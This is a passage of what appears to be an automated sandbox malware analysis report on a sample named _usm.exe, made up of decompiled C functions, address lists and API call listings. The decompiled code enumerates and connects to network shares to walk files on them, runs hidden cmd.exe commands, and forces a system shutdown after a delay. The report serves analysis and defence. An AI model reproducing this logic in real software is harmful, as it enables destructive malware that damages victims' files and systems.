				}
				_t32 = E00142132(_t45);
				if(( *(_t53 - 0x3c) & 0x00000001) == 0) {
					_t46 = 0xa;
				} else {
					_t46 =  *(_t53 - 0x38) & 0x0000ffff;
				}
				_push(_t46);
				_push(_t32);
				_push(0);
				_push(0x140000); // executed
				E001416E9(); // executed
				 *((intOrPtr*)(_t53 - 0x20)) = _t32;
				if( *(_t53 - 0x1c) == 0) {
					E00141D72(_t32);
				}
				E00141D9E();
				 *((intOrPtr*)(_t53 - 4)) = 0xfffffffe;
				return E00142CC5( *((intOrPtr*)(_t53 - 0x20)));
			}
















    0x00141822
    0x00141822
    0x00141822
    0x00141822
    0x00141824
    0x00141829
    0x00141832
    0x0014183a
    0x00141840
    0x00141847
    0x00141847
    0x00141852
    0x00141859
    0x00141860
    0x00141865
    0x0014186f
    0x00000000
    0x00141871
    0x00141871
    0x00141876
    0x0014187d
    0x00000000
    0x0014187f
    0x0014187f
    0x00141886
    0x00000000
    0x00141888
    0x0014188a
    0x00141890
    0x00141890
    0x00141890
    0x00141893
    0x00141893
    0x00141886
    0x0014187d
    0x0014185b
    0x0014185b
    0x0014185b
    0x0014185b
    0x0014189d
    0x001418a1
    0x001418a6
    0x001418a6
    0x001418ae
    0x001418b2
    0x001418b7
    0x001418b7
    0x001418b8
    0x001418bd
    0x001418c0
    0x001418c5
    0x001418c7
    0x001418cb
    0x001418d0
    0x001418d0
    0x001418d7
    0x001418dc
    0x001418e1
    0x001418e6
    0x001418eb
    0x001418ed
    0x001418f1
    0x001418f6
    0x001418f6
    0x001418f7
    0x001418fc
    0x001418fe
    0x00141900
    0x00141902
    0x00141907
    0x0014190a
    0x0014190f
    0x00141910
    0x00141912
    0x00141915
    0x0014191a
    0x0014191a
    0x0014191b
    0x00141924
    0x0014192e
    0x00141926
    0x00141926
    0x00141926
    0x0014192f
    0x00141930
    0x00141931
    0x00141932
    0x00141937
    0x0014193c
    0x00141942
    0x00141945
    0x00141945
    0x0014194a
    0x0014197f
    0x0014198e

    APIs
    • GetStartupInfoW.KERNEL32(?,00147BA0,00000058), ref: 00141832
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00141847
      • Part of subcall function 00142C5E: HeapCreate.KERNELBASE(00000000,00001000,00000000,0014189B), ref: 00142C67
      • Part of subcall function 00142AE3: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,001418AC), ref: 00142AEB
      • Part of subcall function 00142AE3: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,001418AC), ref: 00142B0D
      • Part of subcall function 00142AE3: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,001418AC), ref: 00142B1A
      • Part of subcall function 00142AE3: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,001418AC), ref: 00142B27
      • Part of subcall function 00142AE3: GetProcAddress.KERNEL32(00000000,FlsFree,?,001418AC), ref: 00142B34
      • Part of subcall function 00142AE3: TlsAlloc.KERNEL32(?,001418AC), ref: 00142B84
      • Part of subcall function 00142AE3: TlsSetValue.KERNEL32(00000000,?,001418AC), ref: 00142B9F
      • Part of subcall function 00142AE3: EncodePointer.KERNEL32(?,001418AC), ref: 00142BBA
      • Part of subcall function 00142AE3: EncodePointer.KERNEL32(?,001418AC), ref: 00142BC7
      • Part of subcall function 00142AE3: EncodePointer.KERNEL32(?,001418AC), ref: 00142BD4
      • Part of subcall function 00142AE3: EncodePointer.KERNEL32(?,001418AC), ref: 00142BE1
      • Part of subcall function 00142AE3: DecodePointer.KERNEL32(001429B4,?,001418AC), ref: 00142C02
      • Part of subcall function 00142AE3: DecodePointer.KERNEL32(00000000,?,001418AC), ref: 00142C31
      • Part of subcall function 00142AE3: GetCurrentThreadId.KERNEL32(?,001418AC), ref: 00142C43
    • __RTC_Initialize.LIBCMT ref: 001418B8
      • Part of subcall function 00142559: GetStartupInfoW.KERNEL32(?), ref: 00142566
      • Part of subcall function 00142559: GetFileType.KERNEL32(?), ref: 00142699
      • Part of subcall function 00142559: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 001426CF
      • Part of subcall function 00142559: GetStdHandle.KERNEL32(-000000F6), ref: 00142723
      • Part of subcall function 00142559: GetFileType.KERNEL32(00000000), ref: 00142735
      • Part of subcall function 00142559: InitializeCriticalSectionAndSpinCount.KERNEL32(-0014A794,00000FA0), ref: 00142763
      • Part of subcall function 00142559: SetHandleCount.KERNEL32 ref: 0014278C
    • __amsg_exit.LIBCMT ref: 001418CB
    • GetCommandLineA.KERNEL32 ref: 001418D1
      • Part of subcall function 001424C2: GetEnvironmentStringsW.KERNEL32 ref: 001424CC
      • Part of subcall function 001424C2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0014250A
      • Part of subcall function 001424C2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0014252D
      • Part of subcall function 001424C2: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00142540
      • Part of subcall function 001424C2: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0014254C
      • Part of subcall function 00142407: GetModuleFileNameA.KERNEL32(00000000,C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe,00000104), ref: 00142433
      • Part of subcall function 00142407: _parse_cmdline.LIBCMT ref: 0014245E
      • Part of subcall function 00142407: _parse_cmdline.LIBCMT ref: 0014249F
    • __amsg_exit.LIBCMT ref: 001418F1
      • Part of subcall function 00142191: _strlen.LIBCMT ref: 001421BB
      • Part of subcall function 00142191: _strlen.LIBCMT ref: 001421EC
    • __amsg_exit.LIBCMT ref: 00141902
      • Part of subcall function 00141B9B: __initterm_e.LIBCMT ref: 00141BD1
    • __amsg_exit.LIBCMT ref: 00141915
      • Part of subcall function 001416E9: Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00141704
      • Part of subcall function 001416E9: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00141714
      • Part of subcall function 001416E9: GetCurrentProcess.KERNEL32 ref: 00141734
      • Part of subcall function 001416E9: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00141741
      • Part of subcall function 001416E9: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 00141753
      • Part of subcall function 001416E9: Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 001417AB
      • Part of subcall function 001416E9: CreateThread.KERNEL32(00000000,00000000,Function_000016BF,00000000,00000000,00000000), ref: 001417C0
      • Part of subcall function 001416E9: Sleep.KERNELBASE(0036EE80), ref: 001417CB
      • Part of subcall function 001416E9: InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00050000), ref: 001417DC
      • Part of subcall function 001416E9: ExitProcess.KERNEL32 ref: 001417E3
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00141000, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 73process

    Control-flow Graph

    C-Code - Quality: 76%
    			E00141000(void* __ebx, intOrPtr _a4) {
				signed int _v8;
				short _v1048;
				short _v2088;
				WCHAR* _v2092;
				intOrPtr _v2096;
				struct _PROCESS_INFORMATION _v2112;
				struct _STARTUPINFOW _v2180;
				void* __edi;
				void* __esi;
				signed int _t23;
				int _t36;
				void* _t45;
				long _t46;
				struct _PROCESS_INFORMATION* _t47;
				WCHAR* _t48;
				signed int _t49;

				_t42 = __ebx;
				_t23 =  *0x149004; // 0x20251455
				_v8 = _t23 ^ _t49;
				_t46 = 0x44;
				_t48 = 0;
				_v2096 = _a4;
				_v2092 = 0;
				E00144DA0( &_v2180, 0, _t46);
				_v2180.dwFlags = _v2180.dwFlags | 0x00000101;
				_v2180.cb = _t46;
				_v2180.wShowWindow = 0;
				_t47 =  &_v2112;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				wsprintfW( &_v1048, L"%s %s %s", L"C:\\Windows\\system32\\cmd.exe /c", __ebx, _v2096);
				GetSystemDirectoryW( &_v2088, 0x410);
				_t36 = CreateProcessW(0,  &_v1048, 0, 0, 0, 0, 0, 0,  &_v2180,  &_v2112); // executed
				if(_t36 != 0) {
					WaitForSingleObject(_v2112.hProcess, 0xffffffff);
					_t48 = CloseHandle;
					CloseHandle(_v2112);
					CloseHandle(_v2112.hThread);
					_v2092 = 1;
				}
				return E001417EA(_v2092, _t42, _v8 ^ _t49, _t45, _t47, _t48);
			}



















    0x00141000
    0x00141009
    0x00141010
    0x0014101a
    0x0014101b
    0x0014101e
    0x0014102c
    0x00141032
    0x0014103d
    0x00141047
    0x0014104f
    0x00141056
    0x0014105c
    0x0014105d
    0x0014105e
    0x00141065
    0x00141072
    0x00141087
    0x001410a9
    0x001410b1
    0x001410bb
    0x001410c7
    0x001410cd
    0x001410d5
    0x001410d7
    0x001410d7
    0x001410f4

    APIs
    • wsprintfW.USER32 ref: 00141072
    • GetSystemDirectoryW.KERNEL32(?,00000410), ref: 00141087
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001410A9
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001410BB
    • CloseHandle.KERNEL32(?), ref: 001410CD
    • CloseHandle.KERNEL32(?), ref: 001410D5
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00142559, Relevance: 10.7, APIs: 7, Instructions: 196

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 129 142559-14257d GetStartupInfoW call 1444ad 132 142587-14259a 129->132 133 14257f-142582 129->133 134 1425d2-1425d8 132->134 135 14259c 132->135 136 142796-142798 133->136 137 1426ec 134->137 138 1425de-1425e3 134->138 139 14259f-1425d0 135->139 141 1426ee-1426fe 137->141 138->137 140 1425e9-1425fd 138->140 139->134 139->139 142 142601-142607 140->142 143 1425ff 140->143 144 14270b-142711 141->144 145 142700-142703 141->145 146 142609 142->146 147 142674-142678 142->147 143->142 149 142718-14271f 144->149 150 142713-142716 144->150 145->144 148 142705-142709 145->148 154 14260e-14261b call 1444ad 146->154 147->137 152 14267a-142682 147->152 153 14277c-142780 148->153 151 142722-14272e GetStdHandle 149->151 150->151 157 142730-142732 151->157 158 142772-142776 151->158 155 142684-142687 152->155 156 1426e0-1426ea 152->156 153->141 159 142786-142792 SetHandleCount 153->159 167 14266e 154->167 168 14261d-14262e 154->168 155->156 161 142689-142691 155->161 156->137 156->152 157->158 162 142734-14273d GetFileType 157->162 158->153 163 142794-142795 159->163 161->156 166 142693-142696 161->166 162->158 165 14273f-142749 162->165 163->136 169 14274b-14274f 165->169 170 142751-142754 165->170 171 1426a3-1426d7 InitializeCriticalSectionAndSpinCount 166->171 172 142698-1426a1 GetFileType 166->172 167->147 173 142630 168->173 174 142661-14266a 168->174 175 14275a-14276b InitializeCriticalSectionAndSpinCount 169->175 170->175 176 142756 170->176 178 1426dd 171->178 179 142799-14279c 171->179 172->156 172->171 180 142633-14265f 173->180 174->154 177 14266c 174->177 175->179 181 14276d-142770 175->181 176->175 177->147 178->156 179->163 180->174 180->180 181->153
    C-Code - Quality: 78%
    			E00142559() {
				intOrPtr* _v8;
				void** _v12;
				struct _STARTUPINFOW _v80;
				signed int _t61;
				void* _t62;
				long _t65;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				int _t72;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;
				long _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				int _t93;
				signed char _t98;
				void* _t108;
				signed int _t110;
				signed int* _t111;
				int _t112;
				void** _t115;
				void** _t120;
				signed int _t121;

				GetStartupInfoW( &_v80);
				_push(0x40);
				_t112 = 0x20;
				_push(_t112); // executed
				_t61 = E001444AD(); // executed
				if(_t61 != 0) {
					_t2 = _t61 + 0x800; // 0x800
					 *0x14a7a0 = _t61;
					 *0x14a790 = _t112;
					__eflags = _t61 - _t2;
					if(_t61 >= _t2) {
						L5:
						__eflags = _v80.cbReserved2;
						if(_v80.cbReserved2 == 0) {
							L27:
							_t91 = 0;
							__eflags = 0;
							do {
								_t115 = (_t91 << 6) +  *0x14a7a0;
								_t62 =  *_t115;
								__eflags = _t62 - 0xffffffff;
								if(_t62 == 0xffffffff) {
									L31:
									_t115[1] = 0x81;
									__eflags = _t91;
									if(_t91 != 0) {
										_t50 = _t91 - 1; // -1
										asm("sbb eax, eax");
										_t65 =  ~_t50 + 0xfffffff5;
										__eflags = _t65;
									} else {
										_t65 = 0xfffffff6;
									}
									_t108 = GetStdHandle(_t65);
									__eflags = _t108 - 0xffffffff;
									if(_t108 == 0xffffffff) {
										L43:
										_t58 =  &(_t115[1]);
										 *_t58 = _t115[1] | 0x00000040;
										__eflags =  *_t58;
										 *_t115 = 0xfffffffe;
										goto L44;
									} else {
										__eflags = _t108;
										if(_t108 == 0) {
											goto L43;
										}
										_t69 = GetFileType(_t108);
										__eflags = _t69;
										if(_t69 == 0) {
											goto L43;
										}
										_t70 = _t69 & 0x000000ff;
										 *_t115 = _t108;
										__eflags = _t70 - 2;
										if(_t70 != 2) {
											__eflags = _t70 - 3;
											if(_t70 == 3) {
												_t53 =  &(_t115[1]);
												 *_t53 = _t115[1] | 0x00000008;
												__eflags =  *_t53;
											}
										} else {
											_t115[1] = _t115[1] | 0x00000040;
										}
										_t55 =  &(_t115[3]); // -1353620
										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
										__eflags = _t72;
										if(_t72 == 0) {
											L48:
											_t68 = _t72 | 0xffffffff;
											L46:
											return _t68;
										} else {
											_t115[2] = _t115[2] + 1;
											goto L44;
										}
									}
								}
								__eflags = _t62 - 0xfffffffe;
								if(_t62 == 0xfffffffe) {
									goto L31;
								}
								_t115[1] = _t115[1] | 0x00000080;
								L44:
								_t91 = _t91 + 1;
								__eflags = _t91 - 3;
							} while (_t91 < 3);
							SetHandleCount( *0x14a790);
							_t68 = 0;
							__eflags = 0;
							goto L46;
						}
						_t73 = _v80.lpReserved2;
						__eflags = _t73;
						if(_t73 == 0) {
							goto L27;
						}
						_t93 =  *_t73;
						_t74 = _t73 + 4;
						_v8 = _t74;
						_v12 = _t74 + _t93;
						__eflags = _t93 - 0x800;
						if(_t93 >= 0x800) {
							_t93 = 0x800;
						}
						__eflags =  *0x14a790 - _t93; // 0x20
						if(__eflags >= 0) {
							L18:
							_t110 = 0;
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L27;
							} else {
								goto L19;
							}
							do {
								L19:
								_t77 =  *_v12;
								__eflags = _t77 - 0xffffffff;
								if(_t77 == 0xffffffff) {
									goto L26;
								}
								__eflags = _t77 - 0xfffffffe;
								if(_t77 == 0xfffffffe) {
									goto L26;
								}
								_t98 =  *_v8;
								__eflags = _t98 & 0x00000001;
								if((_t98 & 0x00000001) == 0) {
									goto L26;
								}
								__eflags = _t98 & 0x00000008;
								if((_t98 & 0x00000008) != 0) {
									L24:
									_t120 = ((_t110 & 0x0000001f) << 6) + 0x14a7a0[_t110 >> 5];
									 *_t120 =  *_v12;
									_t120[1] =  *_v8;
									_t40 =  &(_t120[3]); // 0xc
									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L48;
									}
									_t41 =  &(_t120[2]);
									 *_t41 = _t120[2] + 1;
									__eflags =  *_t41;
									goto L26;
								}
								_t85 = GetFileType(_t77);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L26;
								}
								goto L24;
								L26:
								_v12 =  &(_v12[1]);
								_t110 = _t110 + 1;
								_v8 = _v8 + 1;
								__eflags = _t110 - _t93;
							} while (_t110 < _t93);
							goto L27;
						} else {
							_t111 = 0x14a7a4;
							while(1) {
								_t86 = E001444AD(0x20, 0x40);
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								 *0x14a790 =  *0x14a790 + 0x20;
								_t16 = _t86 + 0x800; // 0x800
								 *_t111 = _t86;
								__eflags = _t86 - _t16;
								if(_t86 >= _t16) {
									L15:
									_t111 =  &(_t111[1]);
									__eflags =  *0x14a790 - _t93; // 0x20
									if(__eflags < 0) {
										continue;
									}
									goto L18;
								}
								_t87 = _t86 + 5;
								__eflags = _t87;
								do {
									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
									 *((short*)(_t87 - 1)) = 0xa00;
									 *((short*)(_t87 + 0x20)) = 0xa0a;
									 *((char*)(_t87 + 0x2f)) = 0;
									_t87 = _t87 + 0x40;
									_t28 = _t87 - 5; // -74
									__eflags = _t28 -  *_t111 + 0x800;
								} while (_t28 <  *_t111 + 0x800);
								goto L15;
							}
							_t93 =  *0x14a790; // 0x20
							goto L18;
						}
					}
					_t88 = _t61 + 5;
					__eflags = _t88;
					do {
						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
						 *((short*)(_t88 - 1)) = 0xa00;
						 *((intOrPtr*)(_t88 + 3)) = 0;
						 *((short*)(_t88 + 0x1f)) = 0xa00;
						 *((char*)(_t88 + 0x21)) = 0xa;
						 *((intOrPtr*)(_t88 + 0x33)) = 0;
						 *((char*)(_t88 + 0x2f)) = 0;
						_t121 =  *0x14a7a0; // 0x12c09f0
						_t88 = _t88 + 0x40;
						_t11 = _t88 - 5; // -74
						__eflags = _t11 - _t121 + 0x800;
					} while (_t11 < _t121 + 0x800);
					goto L5;
				}
				return _t61 | 0xffffffff;
			}






























    0x00142566
    0x0014256c
    0x00142570
    0x00142571
    0x00142572
    0x0014257d
    0x00142587
    0x0014258d
    0x00142592
    0x00142598
    0x0014259a
    0x001425d2
    0x001425d4
    0x001425d8
    0x001426ec
    0x001426ec
    0x001426ec
    0x001426ee
    0x001426f3
    0x001426f9
    0x001426fb
    0x001426fe
    0x0014270b
    0x0014270b
    0x0014270f
    0x00142711
    0x00142718
    0x0014271d
    0x0014271f
    0x0014271f
    0x00142713
    0x00142715
    0x00142715
    0x00142729
    0x0014272b
    0x0014272e
    0x00142772
    0x00142772
    0x00142772
    0x00142772
    0x00142776
    0x00000000
    0x00142730
    0x00142730
    0x00142732
    0x00000000
    0x00000000
    0x00142735
    0x0014273b
    0x0014273d
    0x00000000
    0x00000000
    0x0014273f
    0x00142744
    0x00142746
    0x00142749
    0x00142751
    0x00142754
    0x00142756
    0x00142756
    0x00142756
    0x00142756
    0x0014274b
    0x0014274b
    0x0014274b
    0x0014275f
    0x00142763
    0x00142769
    0x0014276b
    0x00142799
    0x00142799
    0x00142794
    0x00000000
    0x0014276d
    0x0014276d
    0x00000000
    0x0014276d
    0x0014276b
    0x0014272e
    0x00142700
    0x00142703
    0x00000000
    0x00000000
    0x00142705
    0x0014277c
    0x0014277c
    0x0014277d
    0x0014277d
    0x0014278c
    0x00142792
    0x00142792
    0x00000000
    0x00142792
    0x001425de
    0x001425e1
    0x001425e3
    0x00000000
    0x00000000
    0x001425e9
    0x001425eb
    0x001425ee
    0x001425f8
    0x001425fb
    0x001425fd
    0x001425ff
    0x001425ff
    0x00142601
    0x00142607
    0x00142674
    0x00142674
    0x00142676
    0x00142678
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0014267a
    0x0014267a
    0x0014267d
    0x0014267f
    0x00142682
    0x00000000
    0x00000000
    0x00142684
    0x00142687
    0x00000000
    0x00000000
    0x0014268c
    0x0014268e
    0x00142691
    0x00000000
    0x00000000
    0x00142693
    0x00142696
    0x001426a3
    0x001426b0
    0x001426bc
    0x001426c3
    0x001426cb
    0x001426cf
    0x001426d5
    0x001426d7
    0x00000000
    0x00000000
    0x001426dd
    0x001426dd
    0x001426dd
    0x00000000
    0x001426dd
    0x00142699
    0x0014269f
    0x001426a1
    0x00000000
    0x00000000
    0x00000000
    0x001426e0
    0x001426e0
    0x001426e4
    0x001426e5
    0x001426e8
    0x001426e8
    0x00000000
    0x00142609
    0x00142609
    0x0014260e
    0x00142612
    0x00142619
    0x0014261b
    0x00000000
    0x00000000
    0x0014261d
    0x00142624
    0x0014262a
    0x0014262c
    0x0014262e
    0x00142661
    0x00142661
    0x00142664
    0x0014266a
    0x00000000
    0x00000000
    0x00000000
    0x0014266c
    0x00142630
    0x00142630
    0x00142633
    0x00142633
    0x00142637
    0x0014263b
    0x0014263f
    0x00142643
    0x00142649
    0x0014264f
    0x00142655
    0x0014265a
    0x0014265d
    0x0014265d
    0x00000000
    0x00142633
    0x0014266e
    0x00000000
    0x0014266e
    0x00142607
    0x0014259c
    0x0014259c
    0x0014259f
    0x0014259f
    0x001425a3
    0x001425a9
    0x001425ac
    0x001425b2
    0x001425b6
    0x001425b9
    0x001425bc
    0x001425c2
    0x001425c5
    0x001425ce
    0x001425ce
    0x00000000
    0x0014259f
    0x00000000

    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 00142566
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • GetFileType.KERNEL32(?), ref: 00142699
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 001426CF
    • GetStdHandle.KERNEL32(-000000F6), ref: 00142723
    • GetFileType.KERNEL32(00000000), ref: 00142735
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-0014A794,00000FA0), ref: 00142763
    • SetHandleCount.KERNEL32 ref: 0014278C
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 001415CB, Relevance: 10.6, APIs: 7, Instructions: 84share

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 182 1415cb-1415fa WNetOpenEnumW 183 1416b3-1416bc 182->183 184 141600-14160e GlobalAlloc 182->184 185 141612-14163b call 144da0 WNetEnumResourceW 184->185 188 14163d-141645 185->188 189 141694-14169c 185->189 188->185 190 141647 188->190 189->185 191 1416a2-1416ad GlobalFree WNetCloseEnum 189->191 192 14164a-14165a WNetAddConnection2W 190->192 191->183 193 14165c-141669 call 141441 WNetCancelConnection2W 192->193 194 14166f-141677 192->194 193->194 196 14167f-14168e 194->196 197 141679-14167a call 1415cb 194->197 196->192 200 141690 196->200 197->196 200->189
    C-Code - Quality: 100%
    			E001415CB(void* __edx, struct _NETRESOURCE* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _t25;
				void* _t28;
				int _t32;
				int _t35;
				void* _t46;
				void* _t52;
				short** _t53;
				signed int _t54;
				void* _t56;

				_t46 = __edx;
				_t56 = (_t54 & 0xfffffff8) - 0x1c;
				_v20 = _v20 | 0xffffffff;
				_v28 = 0x4000;
				_t25 = WNetOpenEnumW(2, 0, 0, _a4,  &_v16); // executed
				if(_t25 == 0) {
					_t28 = GlobalAlloc(0x40, _v28); // executed
					_t52 = _t28;
					_v12 = _t52;
					goto L2;
					do {
						while(1) {
							L2:
							E00144DA0(_t52, 0, _v28);
							_t56 = _t56 + 0xc;
							_t32 = WNetEnumResourceW(_v16,  &_v20, _t52,  &_v28); // executed
							_v8 = _t32;
							if(_t32 != 0) {
								goto L11;
							}
							_v24 = 0;
							if(_v20 <= 0) {
								continue;
							} else {
								_t53 = _t52 + 0x14;
								do {
									_t15 = _t53 - 0x14; // -40
									_t44 = _t15;
									_t35 = WNetAddConnection2W(_t15, 0, 0, 4); // executed
									if(_t35 == 0) {
										E00141441(_t46,  *_t53);
										WNetCancelConnection2W( *_t53, 0, 1);
									}
									if(( *(_t53 - 8) & 0x00000002) == 2) {
										E001415CB(_t46, _t44); // executed
									}
									_v24 = _v24 + 1;
									_t53 =  &(_t53[8]);
								} while (_v24 < _v20);
								_t52 = _v12;
							}
							goto L11;
						}
						L11:
					} while (_v8 != 0x103);
					GlobalFree(_t52);
					WNetCloseEnum(_v16);
				}
				return 1;
			}


















    0x001415cb
    0x001415d1
    0x001415d4
    0x001415ea
    0x001415f2
    0x001415fa
    0x00141606
    0x0014160c
    0x0014160e
    0x0014160e
    0x00141612
    0x00141612
    0x00141612
    0x00141618
    0x0014161d
    0x0014162f
    0x00141635
    0x0014163b
    0x00000000
    0x00000000
    0x0014163d
    0x00141645
    0x00000000
    0x00141647
    0x00141647
    0x0014164a
    0x0014164e
    0x0014164e
    0x00141652
    0x0014165a
    0x0014165e
    0x00141669
    0x00141669
    0x00141677
    0x0014167a
    0x0014167a
    0x0014167f
    0x00141687
    0x0014168a
    0x00141690
    0x00141690
    0x00000000
    0x00141645
    0x00141694
    0x00141694
    0x001416a3
    0x001416ad
    0x001416ad
    0x001416bc

    APIs
    • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 001415F2
    • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?,?,?,?,001416E2,00000000), ref: 00141606
    • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 0014162F
    • WNetAddConnection2W.MPR(-00000028,00000000,00000000,00000004), ref: 00141652
      • Part of subcall function 00141441: wsprintfW.USER32 ref: 0014146D
      • Part of subcall function 00141441: FindFirstFileW.KERNEL32(?,?), ref: 00141484
      • Part of subcall function 00141441: GetProcessHeap.KERNEL32(00000008,00000410), ref: 001414AC
      • Part of subcall function 00141441: HeapAlloc.KERNEL32(00000000), ref: 001414AF
      • Part of subcall function 00141441: PathAppendW.SHLWAPI(00000000,?), ref: 001414C2
      • Part of subcall function 00141441: PathAppendW.SHLWAPI(?,?), ref: 001414D1
      • Part of subcall function 00141441: StrCmpCW.SHLWAPI(?,00147918), ref: 001414EE
      • Part of subcall function 00141441: StrCmpCW.SHLWAPI(?,0014791C), ref: 00141504
      • Part of subcall function 00141441: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 0014153D
      • Part of subcall function 00141441: GetFileSizeEx.KERNEL32(00000000,?), ref: 00141552
      • Part of subcall function 00141441: CloseHandle.KERNEL32(00000000), ref: 00141559
      • Part of subcall function 00141441: GetProcessHeap.KERNEL32(00000008,?), ref: 0014158C
      • Part of subcall function 00141441: HeapFree.KERNEL32(00000000), ref: 0014158F
      • Part of subcall function 00141441: FindNextFileW.KERNEL32(?,00000010), ref: 001415A2
      • Part of subcall function 00141441: FindClose.KERNEL32(?), ref: 001415B6
    • WNetCancelConnection2W.MPR(-00000014,00000000,00000001), ref: 00141669
      • Part of subcall function 001415CB: GlobalFree.KERNEL32(00000000), ref: 001416A3
      • Part of subcall function 001415CB: WNetCloseEnum.MPR(?), ref: 001416AD
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00143552, Relevance: 7.6, APIs: 5, Instructions: 74

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 201 143552-14357a DecodePointer * 2 202 143580-14358a 201->202 203 143601 201->203 202->203 205 14358c-14359a call 144e1a 202->205 204 143603-143607 203->204 208 1435e4-1435ff EncodePointer * 2 205->208 209 14359c-1435a3 205->209 208->204 210 1435a5 209->210 211 1435a7-1435ab 209->211 210->211 212 1435ad-1435ba call 1444f9 211->212 213 1435bc-1435c1 211->213 212->213 219 1435d2-1435df EncodePointer 212->219 213->203 214 1435c3-1435d0 call 1444f9 213->214 214->203 214->219 219->208
    C-Code - Quality: 21%
    			E00143552(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t11;
				intOrPtr* _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t36;
				intOrPtr* _t37;
				void* _t39;
